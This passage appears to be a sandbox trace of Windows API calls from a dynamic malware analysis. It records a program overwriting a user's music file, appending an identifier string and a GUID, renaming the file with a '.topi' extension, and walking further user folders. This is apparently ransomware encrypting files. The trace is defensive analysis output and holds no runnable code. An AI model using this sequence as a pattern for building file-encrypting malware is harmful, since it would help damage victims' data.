hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ee0 | out: hHeap=0x680000) returned 1 [0097.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb7b8 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.646] WriteFile (in: hFile=0x6a8, lpBuffer=0x99fc2d8*, nNumberOfBytesToWrite=0x5117, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99fc2d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x5117, lpOverlapped=0x0) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc2d8 | out: hHeap=0x680000) returned 1 [0097.646] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x511c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.646] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.646] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.646] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.647] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.647] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.647] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.647] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.647] CloseHandle (hObject=0x6a8) returned 1 [0097.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ed08 [0097.664] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8c0) returned 0x31cf750 [0097.664] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ed08 | out: hHeap=0x680000) returned 1 [0097.664] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\vCdGmDM5J3F.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\vcdgmdm5j3f.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\PruBsWuwCDlLwiCR\\vCdGmDM5J3F.m4a.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\prubswuwcdllwicr\\vcdgmdm5j3f.m4a.topi")) returned 1 [0097.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.665] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.665] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.666] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f1993f0, ftCreationTime.dwHighDateTime=0x1d5c05a, ftLastAccessTime.dwLowDateTime=0x7155bf30, ftLastAccessTime.dwHighDateTime=0x1d5bfad, ftLastWriteTime.dwLowDateTime=0x7155bf30, ftLastWriteTime.dwHighDateTime=0x1d5bfad, nFileSizeHigh=0x0, nFileSizeLow=0x511c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vCdGmDM5J3F.m4a", cAlternateFileName="VCDGMD~1.M4A")) returned 0 [0097.666] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0097.666] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.666] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.666] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.666] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.667] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.667] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.668] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.668] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.669] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\") returned="xS9wh\\" [0097.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\") returned="-u63kcF\\" [0097.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0097.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0097.670] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.670] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.670] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 